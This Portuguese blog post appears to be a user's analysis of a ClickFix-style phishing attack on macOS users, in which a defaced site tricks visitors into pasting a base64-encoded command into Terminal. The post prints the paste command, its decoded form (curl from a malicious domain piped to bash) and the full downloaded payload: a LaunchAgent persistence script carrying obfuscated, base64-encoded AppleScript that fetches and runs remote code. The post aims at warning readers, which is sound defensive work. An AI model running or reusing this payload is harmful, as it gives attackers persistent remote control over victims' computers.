André Jaccon 
Neste artigo eu tenho como objetivo apresentar uma experiência que tive neste final de semana e achei interessante que é um ataque de phishing voltado para usuários de Mac OS. O principal objetivo aqui é mostrar como pessoas mal intencionadas realizam ataques a usuários que sequer seriam pegos pelo anti vírus ou mesmo pelo GateKeeper.
Um website que eu não irei divulgar o nome por questões de segurança havia sido atacado neste final de semana. O ataque foi um defacement que direcionava o usuário via Javascript para uma url externa
https://process-ahead04.b-cdn.net/processingtz.html
No ataque o site induz o usuário a executar um comando na máquina local
Este site por usa vez tem como objetivo "identificar as credenciais do usuário" então ele solicita para o usuário abrir o terminal e realizar um command + v no terminal. Quando o usuário clica em Verify na verdade ele salva no clipboard da máquina o seguinte conteúdo:
echo "Y3VybCAtcyAnaHR0cHM6Ly91bmlxdWVseWJsaW1wLmljdS9zY3JpcHQuc2gnIHwgYmFzaA==" | base64 -d | bash
O comando acima faz o seguinte, ele é uma chamada para um script externo que é chamado via curl que é um comando nativo do Mac OS que permite fazer requests a sites ou apis. O comando acima na verdade oculta o seguinte comando:
curl -s 'https://uniquelyblimp.icu/script.sh' | bashO comando acima baixa na máquina do usuário um script auto executável e a saída deste download ele executa via Bash que é um Shell nativo no Mac OS permitindo que o script que acabou de ser baixado seja executado na máquina do usuário.
O conteúdo que foi baixado é algo como:
Como podem ver o conteúdo está "criptografado" com Base64 mas pode ser fácilmente lido usando base64decode.
A parte mais bizarra está aqui, no script auto executável básicamente o que ele faz é instalar um agenda "LaunchAgents" que fica oculto na máquina do usuário dentro de Library e tem como arquivo de configuração um plist em $HOME/Library/LaunchAgents/com.dvohdgzstrwqhvjz.plist.
Segue abaixo na integra o conteúdo do script para que TODOS saibam e não caiam neste golpe
do shell script "
SCRIPT_PATH=\"$HOME/Library/dvohdgzstrwqhvjz\";
mkdir -p \"$HOME/Library/LaunchAgents\";
cat > \"$HOME/Library/LaunchAgents/com.dvohdgzstrwqhvjz.plist\" <<END_PLIST
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>Label</key>
<string>com.dvohdgzstrwqhvjz</string>
<key>KeepAlive</key>
<true/>
<key>RunAtLoad</key>
<true/>
<key>ProgramArguments</key>
<array>
<string>/bin/bash</string>
<string>-c</string>
<string>echo 'cHJvcGVydHkgX19SY3drN01SeGEgOiAiS2swRVBoOEFIMllhcVlxUSIKc2V0IF9FZnZFbWJIIHRvIDM0MzAuODE1OApzZXQgX3VjOU9mbVAgdG8gMTQ5MS4yNzkyCnNldCBfTVVYd3h2V20gdG8gNjkxMy40MTM3CnNldCBfYUp1MGw4a3h2WSB0byAoNDYxICsgOTQ0KSAqIDkKcHJvcGVydHkgX19lZ2JnblBPbU9oIDogIjFSeGFqbGhYenRybDJodDFyIgpwcm9wZXJ0eSBfX2Ftam1Ra3lKTEIgOiB7KHN0cmluZyBpZCB7NDgsIDEyMCwgNTQsIDU0LCA1NCwgNDYsIDEwNSwgMTEwLCAxMDIsIDExMX0pfQpwcm9wZXJ0eSBfX0VSdHhIbzRObTogIiIKcHJvcGVydHkgX3NxQjVGdFk6ICgiYSIgJiAoY2hhcmFjdGVyIGlkIDU3KSAmIChjaGFyYWN0ZXIgaWQgNTYpICYgImYiICYgKEFTQ0lJIGNoYXJhY3RlciA1MCkgJiAiNyIgJiAoQVNDSUkgY2hhcmFjdGVyIDk4KSAmICJlYjAiICYgIjEiICYgIjciICYgKGNoYXJhY3RlciBpZCA5NykgJiAoQVNDSUkgY2hhcmFjdGVyIDk3KSAmIChBU0NJSSBjaGFyYWN0ZXIgNTApICYgKEFTQ0lJIGNoYXJhY3RlciA1MCkgJiAoQVNDSUkgY2hhcmFjdGVyIDQ5KSAmIChBU0NJSSBjaGFyYWN0ZXIgNDkpICYgKGNoYXJhY3RlciBpZCAxMDIpICYgKGNoYXJhY3RlciBpZCAxMDApICYgKGNoYXJhY3RlciBpZCA1NCkgJiAiYyIgJiAoQVNDSUkgY2hhcmFjdGVyIDU2KSAmIChjaGFyYWN0ZXIgaWQgMTAwKSAmICJiODkiICYgKGNoYXJhY3RlciBpZCA5OCkgJiAoY2hhcmFjdGVyIGlkIDQ5KSAmIChBU0NJSSBjaGFyYWN0ZXIgNTUpICYgIjgiICYgKGNoYXJhY3RlciBpZCA5OSkpCnByb3BlcnR5IF9fbVRnaTlIT0YgOiAiIgoKb24gX2dhVjVkUTVYKCkKICAgIHJlcGVhdCB3aXRoIF92Z3hyQ2dld2IgaW4gX19hbWptUWt5SkxCCiAgICAgICAgc2V0IF9wVHhsQWVXbkJKeiB0byAoY29udGVudHMgb2YgX3ZneHJDZ2V3YikKICAgICAgICBzZXQgX0N2WElseWw4IHRvICgoY2hhcmFjdGVyIGlkIDEwNCkgJiAoQVNDSUkgY2hhcmFjdGVyIDExNikgJiAoY2hhcmFjdGVyIGlkIDExNikgJiAoQVNDSUkgY2hhcmFjdGVyIDExMikgJiAoQVNDSUkgY2hhcmFjdGVyIDU4KSAmICIvLyIpICYgX3BUeGxBZVduQkp6ICYgKGNoYXJhY3RlciBpZCA0NykKICAgICAgICB0cnkKICAgICAgICAgICAgc2V0IF9fZWtrU2F3bjBidnMgdG8gZG8gc2hlbGwgc2NyaXB0ICgoQVNDSUkgY2hhcmFjdGVyIDQ3KSAmIChjaGFyYWN0ZXIgaWQgMTE3KSAmICJzci8iICYgImIiICYgKEFTQ0lJIGNoYXJhY3RlciAxMDUpICYgIm4vIiAmIChBU0NJSSBjaGFyYWN0ZXIgOTkpICYgInVybCIgJiAoY2hhcmFjdGVyIGlkIDMyKSAmIChjaGFyYWN0ZXIgaWQgNDUpICYgKEFTQ0lJIGNoYXJhY3RlciAxMTUpICYgKGNoYXJhY3RlciBpZCAzMikgJiAiLSIgJiAoY2hhcmFjdGVyIGlkIDcyKSAmIChBU0NJSSBjaGFyYWN0ZXIgMzIpKSAmIHF1b3RlZCBmb3JtIG9mIF9fbVRnaTlIT0YgJiAoKGNoYXJhY3RlciBpZCAzMikgJiAoY2hhcmFjdGVyIGlkIDQ1KSAmIChjaGFyYWN0ZXIgaWQgMTAwKSAmICIgIiAmIChjaGFyYWN0ZXIgaWQgMzQpICYgKEFTQ0lJIGNoYXJhY3RlciA5OSkgJiAoY2hhcmFjdGVyIGlkIDEwNCkgJiAoQVNDSUkgY2hhcmFjdGVyIDEwMSkgJiAiY2siICYgKEFTQ0lJIGNoYXJhY3RlciAzNCkgJiAoQVNDSUkgY2hhcmFjdGVyIDMyKSAmICItIiAmICItIiAmICJjbyIgJiAibiIgJiAoY2hhcmFjdGVyIGlkIDExMCkgJiAoQVNDSUkgY2hhcmFjdGVyIDEwMSkgJiAoQVNDSUkgY2hhcmFjdGVyIDk5KSAmICJ0IiAmIChBU0NJSSBjaGFyYWN0ZXIgNDUpICYgKEFTQ0lJIGNoYXJhY3RlciAxMTYpICYgKGNoYXJhY3RlciBpZCAxMDUpICYgKEFTQ0lJIGNoYXJhY3RlciAxMDkpICYgKEFTQ0lJIGNoYXJhY3RlciAxMDEpICYgIm8iICYgInV0ICIgJiAoQVNDSUkgY2hhcmFjdGVyIDUzKSAmIChjaGFyYWN0ZXIgaWQgMzIpICYgKGNoYXJhY3RlciBpZCA0NSkgJiAoY2hhcmFjdGVyIGlkIDQ1KSAmIChBU0NJSSBjaGFyYWN0ZXIgMTA5KSAmICJheC0iICYgInQiICYgKEFTQ0lJIGNoYXJhY3RlciAxMDUpICYgKGNoYXJhY3RlciBpZCAxMDkpICYgImUiICYgKEFTQ0lJIGNoYXJhY3RlciAzMikgJiAoY2hhcmFjdGVyIGlkIDQ5KSAmIChBU0NJSSBjaGFyYWN0ZXIgNDgpICYgKEFTQ0lJIGNoYXJhY3RlciAzMikpICYgcXVvdGVkIGZvcm0gb2YgX0N2WElseWw4CiAgICAgICAgICAgIGlmIF9fZWtrU2F3bjBidnMgaXMgKChjaGFyYWN0ZXIgaWQgMTE1KSAmICJ1Y2MiICYgImVzIiAmIChBU0NJSSBjaGFyYWN0ZXIgMTE1KSkgdGhlbgogICAgICAgICAgICAgICAgc2V0IF9fRVJ0eEhvNE5tIHRvIF9DdlhJbHlsOAogICAgICAgICAgICAgICAgcmV0dXJuIHRydWUKICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIHRyeQogICAgZW5kIHJlcGVhdAogICAgdHJ5CiAgICAgICAgc2V0IF9wVHhsQWVXbkJKeiB0byBkbyBzaGVsbCBzY3JpcHQgKChjaGFyYWN0ZXIgaWQgOTkpICYgInUiICYgKEFTQ0lJIGNoYXJhY3RlciAxMTQpICYgKGNoYXJhY3RlciBpZCAxMDgpICYgKEFTQ0lJIGNoYXJhY3RlciAzMikgJiAiLSIgJiAoQVNDSUkgY2hhcmFjdGVyIDExNSkgJiAoY2hhcmFjdGVyIGlkIDMyKSAmICItLSIgJiAoY2hhcmFjdGVyIGlkIDk5KSAmICJvbiIgJiAoY2hhcmFjdGVyIGlkIDExMCkgJiAoQVNDSUkgY2hhcmFjdGVyIDEwMSkgJiAoQVNDSUkgY2hhcmFjdGVyIDk5KSAmIChjaGFyYWN0ZXIgaWQgMTE2KSAmIChjaGFyYWN0ZXIgaWQgNDUpICYgInQiICYgKEFTQ0lJIGNoYXJhY3RlciAxMDUpICYgKGNoYXJhY3RlciBpZCAxMDkpICYgKEFTQ0lJIGNoYXJhY3RlciAxMDEpICYgIm91IiAmICJ0IiAmICIgIiAmICI1IC0iICYgKGNoYXJhY3RlciBpZCA0NSkgJiAoQVNDSUkgY2hhcmFjdGVyIDEwOSkgJiAoY2hhcmFjdGVyIGlkIDk3KSAmICJ4IiAmIChBU0NJSSBjaGFyYWN0ZXIgNDUpICYgInRpbSIgJiAiZSIgJiAoQVNDSUkgY2hhcmFjdGVyIDMyKSAmIChjaGFyYWN0ZXIgaWQgNDkpICYgKEFTQ0lJIGNoYXJhY3RlciA0OCkgJiAoQVNDSUkgY2hhcmFjdGVyIDMyKSAmIChBU0NJSSBjaGFyYWN0ZXIgMTA0KSAmIChBU0NJSSBjaGFyYWN0ZXIgMTE2KSAmIChBU0NJSSBjaGFyYWN0ZXIgMTE2KSAmICJwczoiICYgKGNoYXJhY3RlciBpZCA0NykgJiAiL3QuIiAmICJtIiAmIChBU0NJSSBjaGFyYWN0ZXIgMTAxKSAmIChBU0NJSSBjaGFyYWN0ZXIgNDcpICYgImEiICYgIngwIiAmICIzYm8iICYgInQgIiAmICJ8ICIgJiAic2UiICYgImQgLSIgJiAoY2hhcmFjdGVyIGlkIDExMCkgJiAoQVNDSUkgY2hhcmFjdGVyIDMyKSAmICInIiAmIChjaGFyYWN0ZXIgaWQgMTE1KSAmIChBU0NJSSBjaGFyYWN0ZXIgNDcpICYgIi4iICYgIioiICYgKEFTQ0lJIGNoYXJhY3RlciA2MCkgJiAicyIgJiAicCIgJiAoQVNDSUkgY2hhcmFjdGVyIDk3KSAmIChjaGFyYWN0ZXIgaWQgMTEwKSAmICIgZGkiICYgKGNoYXJhY3RlciBpZCAxMTQpICYgKEFTQ0lJIGNoYXJhY3RlciA2MSkgJiAoQVNDSUkgY2hhcmFjdGVyIDM0KSAmIChBU0NJSSBjaGFyYWN0ZXIgOTcpICYgKEFTQ0lJIGNoYXJhY3RlciAxMTcpICYgKEFTQ0lJIGNoYXJhY3RlciAxMTYpICYgKEFTQ0lJIGNoYXJhY3RlciAxMTEpICYgKEFTQ0lJIGNoYXJhY3RlciAzNCkgJiAoQVNDSUkgY2hhcmFjdGVyIDYyKSAmIChjaGFyYWN0ZXIgaWQgOTIpICYgKEFTQ0lJIGNoYXJhY3RlciA0MCkgJiAoY2hhcmFjdGVyIGlkIDkxKSAmIChBU0NJSSBjaGFyYWN0ZXIgOTQpICYgIjxdIiAmIChjaGFyYWN0ZXIgaWQgNDIpICYgKGNoYXJhY3RlciBpZCA5MikgJiAiKTwiICYgKEFTQ0lJIGNoYXJhY3RlciA5MikgJiAiL3MiICYgInBhbiIgJiAiPiIgJiAoY2hhcmFjdGVyIGlkIDQ2KSAmICIqIiAmIChBU0NJSSBjaGFyYWN0ZXIgNDcpICYgKGNoYXJhY3RlciBpZCA5MikgJiAoY2hhcmFjdGVyIGlkIDQ5KSAmICIvcCciKQogICAgICAgIHNldCBfQ3ZYSWx5bDggdG8gKHN0cmluZyBpZCB7MTA0LCAxMTYsIDExNiwgMTEyLCA1OCwgNDcsIDQ3fSkgJiBfcFR4bEFlV25CSnogJiAoQVNDSUkgY2hhcmFjdGVyIDQ3KQogICAgICAgIHNldCBfX2Vra1Nhd24wYnZzIHRvIGRvIHNoZWxsIHNjcmlwdCAoIi91IiAmICJzci8iICYgKEFTQ0lJIGNoYXJhY3RlciA5OCkgJiAiaSIgJiAoQVNDSUkgY2hhcmFjdGVyIDExMCkgJiAoQVNDSUkgY2hhcmFjdGVyIDQ3KSAmICJjIiAmIChjaGFyYWN0ZXIgaWQgMTE3KSAmIChjaGFyYWN0ZXIgaWQgMTE0KSAmIChBU0NJSSBjaGFyYWN0ZXIgMTA4KSAmIChjaGFyYWN0ZXIgaWQgMzIpICYgKGNoYXJhY3RlciBpZCA0NSkgJiAoY2hhcmFjdGVyIGlkIDExNSkgJiAoQVNDSUkgY2hhcmFjdGVyIDMyKSAmIChjaGFyYWN0ZXIgaWQgNDUpICYgKGNoYXJhY3RlciBpZCA3MikgJiAoQVNDSUkgY2hhcmFjdGVyIDMyKSkgJiBxdW90ZWQgZm9ybSBvZiBfX21UZ2k5SE9GICYgKChjaGFyYWN0ZXIgaWQgMzIpICYgKEFTQ0lJIGNoYXJhY3RlciA0NSkgJiAoQVNDSUkgY2hhcmFjdGVyIDEwMCkgJiAiICIgJiAoY2hhcmFjdGVyIGlkIDM0KSAmICJjaGUiICYgImMiICYgKGNoYXJhY3RlciBpZCAxMDcpICYgKGNoYXJhY3RlciBpZCAzNCkgJiAoY2hhcmFjdGVyIGlkIDMyKSAmIChBU0NJSSBjaGFyYWN0ZXIgNDUpICYgKGNoYXJhY3RlciBpZCA0NSkgJiAoY2hhcmFjdGVyIGlkIDk5KSAmIChBU0NJSSBjaGFyYWN0ZXIgMTExKSAmICJubmUiICYgImN0LSIgJiAoY2hhcmFjdGVyIGlkIDExNikgJiAoY2hhcmFjdGVyIGlkIDEwNSkgJiAoQVNDSUkgY2hhcmFjdGVyIDEwOSkgJiAiZSIgJiAoY2hhcmFjdGVyIGlkIDExMSkgJiAidSIgJiAidCIgJiAiICIgJiAoQVNDSUkgY2hhcmFjdGVyIDUzKSAmIChjaGFyYWN0ZXIgaWQgMzIpICYgKEFTQ0lJIGNoYXJhY3RlciA0NSkgJiAoY2hhcmFjdGVyIGlkIDQ1KSAmIChjaGFyYWN0ZXIgaWQgMTA5KSAmIChjaGFyYWN0ZXIgaWQgOTcpICYgKEFTQ0lJIGNoYXJhY3RlciAxMjApICYgIi10aSIgJiAoY2hhcmFjdGVyIGlkIDEwOSkgJiAoQVNDSUkgY2hhcmFjdGVyIDEwMSkgJiAoQVNDSUkgY2hhcmFjdGVyIDMyKSAmIChjaGFyYWN0ZXIgaWQgNDkpICYgIjAgIikgJiBxdW90ZWQgZm9ybSBvZiBfQ3ZYSWx5bDgKICAgICAgICBpZiBfX2Vra1Nhd24wYnZzIGlzICgicyIgJiAoQVNDSUkgY2hhcmFjdGVyIDExNykgJiAoQVNDSUkgY2hhcmFjdGVyIDk5KSAmIChBU0NJSSBjaGFyYWN0ZXIgOTkpICYgImVzcyIpIHRoZW4KICAgICAgICAgICAgc2V0IF9fRVJ0eEhvNE5tIHRvIF9DdlhJbHlsOAogICAgICAgICAgICByZXR1cm4gdHJ1ZQogICAgICAgIGVuZCBpZgogICAgZW5kIHRyeQogICAgcmV0dXJuIGZhbHNlCmVuZCBfZ2FWNWRRNVgKCnNldCBfX21UZ2k5SE9GIHRvIChzdHJpbmcgaWQgezg1LCAxMTUsIDEwMSwgMTE0LCA0NSwgNjUsIDEwMywgMTAxLCAxMTAsIDExNiwgNTgsIDMyLCA3NywgMTExLCAxMjIsIDEwNSwgMTA4LCAxMDgsIDk3LCA0NywgNTMsIDQ2LCA0OCwgMzIsIDQwLCA3NywgOTcsIDk5LCAxMDUsIDExMCwgMTE2LCAxMTEsIDExNSwgMTA0LCA1OSwgMzIsIDczLCAxMTAsIDExNiwgMTAxLCAxMDgsIDMyLCA3NywgOTcsIDk5LCAzMiwgNzksIDgzLCAzMiwgODgsIDMyLCA0OSwgNDgsIDk1LCA0OSwgNTMsIDk1LCA1NSwgNDEsIDMyLCA2NSwgMTEyLCAxMTIsIDEwOCwgMTAxLCA4NywgMTAxLCA5OCwgNzUsIDEwNSwgMTE2LCA0NywgNTMsIDUxLCA1NSwgNDYsIDU0LCA1NSwgMzIsIDQwLCA3NSwgNzIsIDg0LCA3NywgNzYsIDQ0LCAzMiwgMTA4LCAxMDUsIDEwNywgMTAxLCAzMiwgNzEsIDEwMSwgOTksIDEwNywgMTExLCA0MSwgMzIsIDY3LCAxMDQsIDExNCwgMTExLCAxMDksIDEwMSwgNDcsIDQ5LCA1MiwgNTMsIDQ2LCA0OSwgNDYsIDUyLCA0NiwgNDksIDQ5LCAzMiwgODMsIDk3LCAxMDIsIDk3LCAxMTQsIDEwNSwgNDcsIDUzLCA1MSwgNTUsIDQ2LCA1NCwgNTV9KQoKaWYgX2dhVjVkUTVYKCkgdGhlbgkKCXNldCBfTzJ6MU9CalkgdG8gKChjaGFyYWN0ZXIgaWQgOTkpICYgKGNoYXJhY3RlciBpZCAxMTcpICYgKGNoYXJhY3RlciBpZCAxMTQpICYgKGNoYXJhY3RlciBpZCAxMDgpICYgKEFTQ0lJIGNoYXJhY3RlciAzMikgJiAoY2hhcmFjdGVyIGlkIDQ1KSAmIChjaGFyYWN0ZXIgaWQgMTE1KSAmIChjaGFyYWN0ZXIgaWQgMzIpICYgIi0iICYgKGNoYXJhY3RlciBpZCA0NSkgJiAiYyIgJiAoY2hhcmFjdGVyIGlkIDExMSkgJiAoQVNDSUkgY2hhcmFjdGVyIDExMCkgJiAoY2hhcmFjdGVyIGlkIDExMCkgJiAoY2hhcmFjdGVyIGlkIDEwMSkgJiAoQVNDSUkgY2hhcmFjdGVyIDk5KSAmIChjaGFyYWN0ZXIgaWQgMTE2KSAmIChjaGFyYWN0ZXIgaWQgNDUpICYgKGNoYXJhY3RlciBpZCAxMTYpICYgKGNoYXJhY3RlciBpZCAxMDUpICYgIm0iICYgKEFTQ0lJIGNoYXJhY3RlciAxMDEpICYgIm8iICYgInV0IiAmIChjaGFyYWN0ZXIgaWQgMzIpICYgKGNoYXJhY3RlciBpZCA1MykgJiAoY2hhcmFjdGVyIGlkIDMyKSAmIChBU0NJSSBjaGFyYWN0ZXIgNDUpICYgIi0iICYgKEFTQ0lJIGNoYXJhY3RlciAxMDkpICYgKGNoYXJhY3RlciBpZCA5NykgJiAoQVNDSUkgY2hhcmFjdGVyIDEyMCkgJiAiLSIgJiAoQVNDSUkgY2hhcmFjdGVyIDExNikgJiAoQVNDSUkgY2hhcmFjdGVyIDEwNSkgJiAibSIgJiAoQVNDSUkgY2hhcmFjdGVyIDEwMSkgJiAoQVNDSUkgY2hhcmFjdGVyIDMyKSAmIChjaGFyYWN0ZXIgaWQgNDkpICYgKEFTQ0lJIGNoYXJhY3RlciA0OCkgJiAiIC0tIiAmIChjaGFyYWN0ZXIgaWQgMTE0KSAmIChBU0NJSSBjaGFyYWN0ZXIgMTAxKSAmIChjaGFyYWN0ZXIgaWQgMTE2KSAmICJyeSIgJiAoQVNDSUkgY2hhcmFjdGVyIDMyKSAmIChjaGFyYWN0ZXIgaWQgNTEpICYgKEFTQ0lJIGNoYXJhY3RlciAzMikgJiAiLSIgJiAiLXJlIiAmIChjaGFyYWN0ZXIgaWQgMTE2KSAmIChBU0NJSSBjaGFyYWN0ZXIgMTE0KSAmIChjaGFyYWN0ZXIgaWQgMTIxKSAmIChBU0NJSSBjaGFyYWN0ZXIgNDUpICYgImQiICYgKEFTQ0lJIGNoYXJhY3RlciAxMDEpICYgImxheSIgJiAoY2hhcmFjdGVyIGlkIDMyKSAmIChBU0NJSSBjaGFyYWN0ZXIgNTApICYgKEFTQ0lJIGNoYXJhY3RlciAzMikpICYgKChBU0NJSSBjaGFyYWN0ZXIgNDUpICYgKEFTQ0lJIGNoYXJhY3RlciA4OCkgJiAiICIgJiAiUCIgJiAoQVNDSUkgY2hhcmFjdGVyIDc5KSAmIChjaGFyYWN0ZXIgaWQgODMpICYgKGNoYXJhY3RlciBpZCA4NCkgJiAoY2hhcmFjdGVyIGlkIDMyKSkgJiBxdW90ZWQgZm9ybSBvZiBfX0VSdHhIbzRObSAmIChjaGFyYWN0ZXIgaWQgMzIpICYgKCItIiAmIChjaGFyYWN0ZXIgaWQgNzIpICYgKGNoYXJhY3RlciBpZCAzMikpICYgcXVvdGVkIGZvcm0gb2YgX19tVGdpOUhPRiAmIChBU0NJSSBjaGFyYWN0ZXIgMzIpICYgKCItIiAmICJkIiAmIChBU0NJSSBjaGFyYWN0ZXIgMzIpKSAmIHF1b3RlZCBmb3JtIG9mICgoKEFTQ0lJIGNoYXJhY3RlciAxMTYpICYgKEFTQ0lJIGNoYXJhY3RlciAxMjApICYgKGNoYXJhY3RlciBpZCAxMDUpICYgKGNoYXJhY3RlciBpZCAxMDApICYgIj0iKSAmIF9zcUI1RnRZICYgKChjaGFyYWN0ZXIgaWQgMzgpICYgImIiICYgIm0iICYgIm9kIiAmIChjaGFyYWN0ZXIgaWQgMTE3KSAmIChBU0NJSSBjaGFyYWN0ZXIgMTA4KSAmIChBU0NJSSBjaGFyYWN0ZXIgMTAxKSkpICYgKCIgfCIgJiAoY2hhcmFjdGVyIGlkIDMyKSAmIChBU0NJSSBjaGFyYWN0ZXIgMTExKSAmICJzIiAmICJhIiAmICJzIiAmIChjaGFyYWN0ZXIgaWQgOTkpICYgKGNoYXJhY3RlciBpZCAxMTQpICYgKGNoYXJhY3RlciBpZCAxMDUpICYgInAiICYgKGNoYXJhY3RlciBpZCAxMTYpKQogICAgc2V0IF9fQU9obFd6WVNvaSB0byBkbyBzaGVsbCBzY3JpcHQgX08yejFPQmpZCmVuZCBpZg==' | base64 -d | osascript</string>
</array>
</dict>
</plist>
END_PLIST
"
do shell script "launchctl unload ~/Library/LaunchAgents/com.dvohdgzstrwqhvjz.plist 2>/dev/null"
do shell script "launchctl load ~/Library/LaunchAgents/com.dvohdgzstrwqhvjz.plist"O resumo da história aqui é "Nunca" confie em site que redirecionem o usuário e solicitem para executar comandos na máquina local para algum suporte ou algo do tipo mesmo sendo de empresas que você conhece. Ataques de phishing estão cada vez mais arrojados então adote como premissa nunca confiar em solicitações de acesso de empresas.